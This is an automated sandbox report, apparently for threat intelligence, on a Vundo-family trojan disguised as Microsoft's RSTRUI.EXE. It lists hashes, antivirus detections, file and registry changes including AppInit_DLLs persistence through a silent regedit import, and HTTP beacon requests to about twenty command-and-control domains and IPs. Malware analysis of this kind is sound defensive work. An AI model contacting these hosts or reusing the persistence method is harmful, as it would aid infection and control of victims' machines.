Analysis Date | 2014-11-22 10:24:05 |
---|---|
MD5 | 27693900b327b570d0aa240a2da1fbd9 |
SHA1 | 9f899723711a6fba750a102087c1409d8a2a3c41 |
Static Details:
File type | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | |
---|---|---|
Section | .text md5: 2d1ba9174b64608447ea98175109840f sha1: b210ba5bf7fe4423441d2572a337dd82c256e5a9 size: 91648 | |
Section | _ASM2 md5: 62c826d4ddef367d075c0cba0669f0a0 sha1: b240b0ac984e37c53bffb3e34f2fc960b9468d77 size: 63488 | |
Section | .rdata md5: 80759194640cd0c281898748a3c7253b sha1: dcb925370efdab1968bdce434442f7fbd7245c68 size: 8192 | |
Section | .data md5: 38e766bb1ef49e52025bc1f89e1812ff sha1: edbc9cadc0cfd216f791595068951582ff10913c size: 5120 | |
Section | .tls md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512 | |
Section | .rsrc md5: c57f9dda23e74dc2dffbaa3c8425f4c6 sha1: b4ae49516f17224939910fb68e13bc1ba5f2c037 size: 34304 | |
Timestamp | 2012-09-25 04:15:44 | |
Version | LegalCopyright: © Корпорация Майкрософт. Все права защищены. InternalName: RSTRUI.EXE FileVersion: 5.1.2600.5512 (xpsp.080413-2108) CompanyName: Корпорация Майкрософт ProductName: Операционная система Microsoft® Windows® ProductVersion: 5.1.2600.5512 FileDescription: Приложение восстановления системы OriginalFilename: RSTRUI.EXE | |
Packer | Microsoft Visual C++ ?.? | |
PEhash | ed7168502630d6f765608bf68788c6f93aa2bee5 | |
IMPhash | 11c52178b812c23b7febf02fc8e99619 | |
AV | 360 Safe | Gen:Variant.Spy.5 |
AV | Ad-Aware | Gen:Variant.Spy.5 |
AV | Alwil (avast) | Vundo-XF [Trj] |
AV | Arcabit (arcavir) | no_virus |
AV | Authentium | W32/Cidox.A.gen!Eldorado |
AV | Avira (antivir) | TR/Vundo.Gen7 |
AV | BullGuard | Gen:Variant.Spy.5 |
AV | CA (E-Trust Ino) | no_virus |
AV | CAT (quickheal) | Trojan.Vundo.Gen |
AV | ClamAV | WIN.Trojan.Agent-164717 |
AV | Dr. Web | Trojan.Inject1.10169 |
AV | Emsisoft | Gen:Variant.Spy.5 |
AV | Eset (nod32) | Win32/Kryptik.AMFU |
AV | Fortinet | W32/Citirevo.AB!tr |
AV | Frisk (f-prot) | W32/Cidox.A.gen!Eldorado |
AV | F-Secure | Gen:Variant.Spy.5 |
AV | Grisoft (avg) | Generic_r.BGN |
AV | Ikarus | Trojan-Downloader.Win32.Vundo |
AV | K7 | Backdoor ( 04c4f2bf1 ) |
AV | Kaspersky | Trojan.Win32.Generic |
AV | MalwareBytes | Trojan.FakeMS.ED |
AV | Mcafee | Vundo-FASV!27693900B327 |
AV | Microsoft Security Essentials | TrojanDropper:Win32/Vundo.V |
AV | MicroWorld (escan) | Gen:Variant.Spy.5 |
AV | Rising | no_virus |
AV | Sophos | Mal/Vundo-M |
AV | Symantec | Trojan.Gen.2 |
AV | Trend Micro | TROJ_VUNDO.SMKK |
AV | VirusBlokAda (vba32) | no_virus |
Runtime Details:
Process
↳ C:\malware.exe
Creates File | C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp |
---|---|
Creates File | C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Cookies\index.dat |
Process
↳ C:\WINDOWS\Explorer.EXE
Registry | HKEY_CURRENT_USER\SessionInformation\ProgramCount ➝ NULL |
---|---|
Creates File | C:\WINDOWS\system32\hyjrqnc.dll |
Creates File | \Device\Afd\Endpoint |
Creates File | C:\Documents and Settings\Administrator\Cookies\cf |
Deletes File | C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp |
Deletes File | C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg |
Creates Process | C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg |
Winsock DNS | clickbeta.ru |
Winsock DNS | denadb.com |
Winsock DNS | 91.220.35.154 |
Winsock DNS | terrans.su |
Winsock DNS | tryatdns.com |
Winsock DNS | clickclans.ru |
Winsock DNS | denareclick.com |
Winsock DNS | fescheck.com |
Winsock DNS | instrango.com |
Winsock DNS | verzinla.com |
Winsock DNS | getintsu.com |
Winsock DNS | tegimode.com |
Winsock DNS | netrovad.com |
Winsock DNS | nshouse1.com |
Winsock DNS | veriolana.com |
Winsock DNS | inzavora.com |
Winsock DNS | odobvare.com |
Winsock DNS | foradns.com |
Winsock DNS | getavodes.com |
Winsock DNS | clickstano.com |
Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝ C:\WINDOWS\system32\hyjrqnc.dll\\x00 |
---|
Network Details:
DNS | getintsu.com Type: A 141.8.225.80 |
---|---|
DNS | getavodes.com Type: A 141.8.225.80 |
DNS | tryatdns.com Type: A 209.222.14.3 |
DNS | fescheck.com Type: A 209.222.14.3 |
DNS | instrango.com Type: A 204.11.56.26 |
DNS | inzavora.com Type: A 141.8.225.80 |
DNS | denadb.com Type: A 204.11.56.26 |
DNS | foradns.com Type: A 141.8.225.62 |
DNS | veriolana.com Type: A |
DNS | verzinla.com\032 Type: A |
DNS | netrovad.com Type: A |
DNS | odobvare.com Type: A |
DNS | terrans.su Type: A |
DNS | tegimode.com Type: A |
DNS | clickstano.com Type: A |
DNS | denareclick.com Type: A |
DNS | clickbeta.ru Type: A |
DNS | nshouse1.com Type: A |
DNS | clickclans.ru Type: A |
HTTP GET | http://getintsu.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7MhHYfvVjdvm User-Agent: |
HTTP GET | http://getavodes.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7KXq7TYIaWNT User-Agent: |
HTTP GET | http://tryatdns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7GWqf3nLQkm3 User-Agent: |
HTTP GET | http://fescheck.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7C2CLOdXR1x7 User-Agent: |
HTTP GET | http://instrango.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7Bf8bvoXlKnf User-Agent: |
HTTP GET | http://inzavora.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7MhHYfvVjdvm User-Agent: |
HTTP GET | http://denadb.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7EZ5+AFDzOit User-Agent: |
HTTP GET | http://foradns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7DU5SDo9CRU2 User-Agent: |
HTTP GET | http://91.220.35.154/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7B4l6AvLbvw9 User-Agent: |
Flows TCP | 192.168.1.1:1031 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1032 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1033 ➝ 209.222.14.3:80 |
Flows TCP | 192.168.1.1:1034 ➝ 209.222.14.3:80 |
Flows TCP | 192.168.1.1:1035 ➝ 204.11.56.26:80 |
Flows TCP | 192.168.1.1:1036 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1037 ➝ 204.11.56.26:80 |
Flows TCP | 192.168.1.1:1038 ➝ 141.8.225.62:80 |
Flows TCP | 192.168.1.1:1039 ➝ 91.220.35.154:80 |
Raw Pcap
Strings